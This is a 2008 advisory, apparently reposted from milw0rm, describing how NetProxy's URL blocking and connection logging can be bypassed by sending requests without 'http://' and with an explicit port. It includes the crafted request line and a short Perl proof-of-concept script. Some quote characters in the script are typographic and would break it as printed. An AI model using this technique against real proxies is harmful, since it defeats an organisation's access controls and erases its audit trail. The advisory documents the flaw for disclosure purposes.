Mon 3 Nov, 2008
Sending a specially crafted request to the NetProxy proxy server allows users to view restricted Web content and bypass the proxy’s logging feature.
Description
Assume that access to http://www.milw0rm.com has been blocked. The standard query string sent to NetProxy looks like:
GET http://www.milw0rm.com HTTP/1.0
NetProxy recognizes that this is a blocked URL and subsequently blocks the request. However, sending a request without ‘http://’ in the URL allows access to the blocked URL (note that the port must be manually specified as well):
GET www.milw0rm.com:80 HTTP/1.0
In addition, requests made in this manner are not logged to NetProxy’s connection log file.
Exploit POC
#!/usr/bin/perl
use IO::Socket;
#Define the NetProxy server and port
$proxy_ip = "127.0.0.1";
$proxy_port = "8080";
#Set the site, port and page to request
$site = "www.milw0rm.com";
$port = "80";
$page = "index.html";
#Define FF and IE user agent strings
$ms_ie = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
$ms_ff = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
#Create connection to NetProxy
my $sock = new IO::Socket::INET(
Proto => 'tcp',
PeerAddr => $proxy_ip,
PeerPort => $proxy_port,
);
die "Failed to connect to [$proxy_ip:$proxy_port] : $!\n” unless $sock;
#Format the request
$request = “GET $site:$port/$page HTTP/1.0\r\n”;
$request .= “User-Agent: $ms_ff\r\n”;
$request .= “\r\n”;
#Send the request
print $sock $request;
#Read the reply
while(<$sock>){
$reply .= $_;
}
close($sock);
#Separate NetProxy header from HTML
($header,$html) = split(”\r\n\r”,$reply);
print $html;
exit;
Credits
Discovered by Craig Heffner and originally posted on milw0rm.